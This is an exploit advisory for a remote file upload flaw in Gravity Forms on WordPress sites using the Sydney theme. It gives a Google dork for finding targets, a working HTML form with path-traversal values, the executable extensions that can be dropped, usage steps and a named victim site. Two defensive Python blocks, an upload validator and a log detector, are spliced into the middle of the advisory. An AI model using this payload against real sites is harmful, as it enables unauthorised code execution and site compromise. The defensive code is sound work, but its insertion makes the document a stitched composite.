#################################################################################################

# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 08/06/2018
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]

#################################################################################################

# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''

# Exploit HTML Code :

<html>
<head><title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title></head>
<body>
<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
</body>
</html>

Exploit : TARGET/?gf_page=upload

The upload cannot be submitted from the target site itself; the file is uploaded by submitting the remote form page above against the target.

# Error :  {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

# Response [ Successful ] :  {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

# Allowed File Extensions :  .html  .htm .php5 .txt  .jpg .gif .png  .html.fla  .phtml .pdf 

# You do not need to rename your file to something like _input__kingskrupellos.php5 yourself.

# Just choose a file from your machine and upload it with one of the extensions listed above.

# For example, a file named yourfilename.php is stored on the server [ site ] as /_input__kingskrupellos.php5
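The two ingredients of the behaviour described above are a destination path built from attacker-controlled form_id / gform_unique_id values and an extension list that still admits server-executable names (.php5, .phtml). The following is an added example of how a defender would validate those same parameters before touching the filesystem; it is not Gravity Forms' or the theme's code, and the handler name validate_upload, the upload root directory and the allow/deny lists are assumptions chosen for illustration.

```python
import os
import re
from pathlib import PurePosixPath

# Constructed allowlist: only inert document/image types. It is deliberately
# narrower than the extension list reported in the advisory.
ALLOWED_EXTENSIONS = {".jpg", ".gif", ".png", ".pdf", ".txt"}
# Names the web server may execute or that enable stored script injection; these are
# rejected even as an "inner" extension (e.g. shell.php5.jpg).
DANGEROUS_EXTENSIONS = {".php", ".php5", ".phtml", ".html", ".htm", ".fla"}

# Form ids are integers and the per-upload unique id is an opaque token; both end up
# in the destination path, so they get a strict shape check (assumed patterns).
FORM_ID_RE = re.compile(r"[0-9]{1,10}")
UNIQUE_ID_RE = re.compile(r"[A-Za-z0-9]{8,64}")
UNSAFE_NAME_CHARS = re.compile(r"[^A-Za-z0-9._-]")


class UploadRejected(ValueError):
    """Raised when a request fails validation; the message names the failed check."""


def validate_upload(form_id, gform_unique_id, uploaded_name,
                    upload_root="/var/www/uploads/gravity_forms"):
    """Return the absolute destination path for a temp upload, or raise UploadRejected.

    Hypothetical handler that mirrors the parameter names from the advisory's form.
    Each check blocks one ingredient of the reported issue: traversal through
    form_id / gform_unique_id, and dangerous extensions in the supplied filename.
    """
    if not FORM_ID_RE.fullmatch(form_id or ""):
        raise UploadRejected("form_id must be a positive integer")
    if not UNIQUE_ID_RE.fullmatch(gform_unique_id or ""):
        raise UploadRejected("gform_unique_id is not an opaque token")

    # Keep only the last path component, regardless of separator, then strip
    # anything outside a conservative character set.
    base = (uploaded_name or "").replace("\\", "/").rsplit("/", 1)[-1]
    base = UNSAFE_NAME_CHARS.sub("_", base)
    if not base or base.startswith("."):
        raise UploadRejected("invalid filename")

    # Inspect every extension component, not just the last one.
    suffixes = [s.lower() for s in PurePosixPath(base).suffixes]
    if not suffixes or suffixes[-1] not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed")
    if any(s in DANGEROUS_EXTENSIONS for s in suffixes[:-1]):
        raise UploadRejected("dangerous embedded extension")

    # Build the path from validated pieces and still confirm it stays inside the root.
    dest = os.path.normpath(os.path.join(upload_root, form_id, gform_unique_id, base))
    if os.path.commonpath([upload_root, dest]) != upload_root:
        raise UploadRejected("path escapes upload root")
    return dest


def rejection_reason(form_id, gform_unique_id, uploaded_name):
    """Convenience wrapper: the rejection message, or None when the upload is accepted."""
    try:
        validate_upload(form_id, gform_unique_id, uploaded_name)
    except UploadRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed cases: the advisory's traversal values, a disguised extension, and
    # an ordinary image upload.
    for case in [("../../../", "../../", "kingskrupellos.html"),
                 ("1", "abcdef1234567890", "_input__kingskrupellos.php5"),
                 ("1", "abcdef1234567890", "shell.php5.jpg"),
                 ("3", "abcdef1234567890", "photo.png")]:
        print(case, "->", rejection_reason(*case) or validate_upload(*case))
```

The order of the checks matters: the cheap shape checks on form_id and gform_unique_id run first so that no path arithmetic happens on traversal strings, and the final commonpath comparison is kept as a second line of defence in case a later change loosens one of the patterns.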

# Example Usage for Windows : 

# Use it with the XAMPP Control Panel on your localhost.
# Serve the HTML file from the htdocs folder of your XAMPP installation.

# 127.0.0.1/athemeswordpressexploiter.html

# Path :  TARGET/_input__kingskrupellos.php5
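From the server side, the usage described above leaves a recognisable trace in the access log: a POST to the gf_page=upload endpoint whose Referer is a page hosted somewhere other than the site (here the localhost page), followed by a 200 response for a freshly dropped server-executable file. The following is an added detection example, not part of the advisory; the log lines are constructed in Apache combined format, the IP addresses are documentation ranges, and the function names and the list of known WordPress entry points are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log. The first client mirrors the advisory's flow (upload form
# served from 127.0.0.1, then a request for the resulting .php5 file); the second is an
# ordinary visitor submitting a form from the site's own contact page.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Jun/2018:10:15:07 +0000] "POST /?gf_page=upload HTTP/1.1" 200 96 "http://127.0.0.1/athemeswordpressexploiter.html" "Mozilla/5.0"
203.0.113.10 - - [08/Jun/2018:10:15:09 +0000] "GET /_input__kingskrupellos.php5 HTTP/1.1" 200 33 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2018:10:16:00 +0000] "POST /?gf_page=upload HTTP/1.1" 200 120 "https://www.example.test/contact/" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2018:10:16:02 +0000] "GET /contact/ HTTP/1.1" 200 4096 "https://www.example.test/contact/" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Server-side executable extensions seen in the advisory's allowed list.
EXEC_SUFFIXES = (".php", ".php5", ".phtml")
# Assumed starting allowlist of legitimate WordPress PHP entry points (extend per site).
KNOWN_PHP_PATHS = {"/index.php", "/wp-login.php", "/wp-cron.php", "/xmlrpc.php",
                   "/wp-comments-post.php"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def is_upload_request(rec):
    return rec["method"] == "POST" and rec["query"].get("gf_page") == ["upload"]


def referer_is_foreign(rec, site_hosts):
    """True when the upload was not submitted from a page on the site itself."""
    ref = rec["referer"]
    if ref in ("", "-"):
        return True
    return urlsplit(ref).hostname not in site_hosts


def is_executable_artifact(rec):
    """A successful GET for a PHP-like file that is not a known WordPress entry point."""
    path = rec["path"].lower()
    if rec["method"] != "GET" or rec["status"] != 200:
        return False
    if path in KNOWN_PHP_PATHS or path.startswith("/wp-admin/"):
        return False
    return path.endswith(EXEC_SUFFIXES)


def analyse(log_text, site_hosts):
    """Return findings in log order; a fetched executable after a foreign upload is 'high'."""
    findings = []
    foreign_uploaders = set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if is_upload_request(rec) and referer_is_foreign(rec, site_hosts):
            foreign_uploaders.add(rec["ip"])
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "severity": "medium",
                             "reason": "gf_page=upload submitted from outside the site",
                             "target": rec["target"]})
        elif is_executable_artifact(rec):
            severity = "high" if rec["ip"] in foreign_uploaders else "medium"
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "severity": severity,
                             "reason": "200 for server-executable file outside known paths",
                             "target": rec["target"]})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG, {"www.example.test"}):
        print(f"{f['severity']:6} {f['ip']:15} {f['ts']} {f['reason']}: {f['target']}")
```

The Referer check is a heuristic: clients can omit or forge it, so its absence only lowers confidence rather than clearing the request, and the correlation with a later request for an executable artifact is what raises a finding to high. A complementary control that does not depend on logs is a periodic sweep of the upload directory for files with any of the EXEC_SUFFIXES names.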

#################################################################################################

# Example Site =>  miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################